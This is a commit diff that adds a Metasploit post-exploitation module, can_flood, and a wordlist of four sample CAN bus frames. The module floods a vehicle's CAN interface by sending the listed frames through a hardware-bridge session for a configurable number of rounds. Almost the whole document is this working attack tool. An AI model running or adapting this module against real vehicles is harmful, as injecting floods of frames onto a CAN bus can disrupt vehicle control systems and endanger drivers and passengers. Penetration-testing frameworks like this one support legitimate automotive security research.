Add can_flood post exploitation for CAN and added example list of frames

2019-03-20 13:17:41 +01:00 · 2019-03-20 13:17:41 +01:00 · ce218fc86a
parent 59046eba20
commit ce218fc86a
2 changed files with 47 additions and 0 deletions
--- a/data/wordlists/frameListCanBus.txt
+++ b/data/wordlists/frameListCanBus.txt
@ -0,0 +1,4 @@
+244+0000009999
+188+030000
+19b+00000F
+19b+000010
--- a/modules/post/hardware/automotive/can_flood.rb
+++ b/modules/post/hardware/automotive/can_flood.rb
@ -0,0 +1,43 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+class MetasploitModule < Msf::Post
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'can_flood',
+        'Description' => 'Module that floods a CAN interface',
+        'License' => MSF_LICENSE,
+        'Author' => ['Pietro Biondi'],
+        'DisclosureDate' => ['March 20 2019'],
+        'Platform' => ['hardware'],
+        'SessionTypes' => ['hwbridge']
+      )
+    )
+    register_options(
+      [
+        OptInt.new('ROUND_NUMBER', [false, 'Number of executed rounds', 200]),
+        OptString.new('CANBUS', [false, 'CAN interface', nil]),
+        OptString.new('FRAMELIST', [true, 'Path to FRAMELIST', ::File.join(Msf::Config.data_directory, 'wordlists', 'frameListCanBus.txt')])
+      ]
+    )
+  end
+
+  def run
+    print_status(' -- OPENING FRAMELIST FILE --')
+    unless ::File.exist? datastore['FRAMELIST']
+      print_error "Frame list file '#{datastore['FRAMELIST']}' does not exist"
+      return
+    end
+    lines = File.readlines(datastore['FRAMELIST']).map { |line| line.strip }
+    print_status(' -- FLOODING -- ')
+    (0..datastore['ROUND_NUMBER']).each do
+      for i in 0..lines.length - 1
+        frame = lines.map { |s| s.split('+') }
+        client.automotive.cansend(datastore['CANBUS'], frame[i][0], frame[i][1])
+      end
+    end
+  end
+end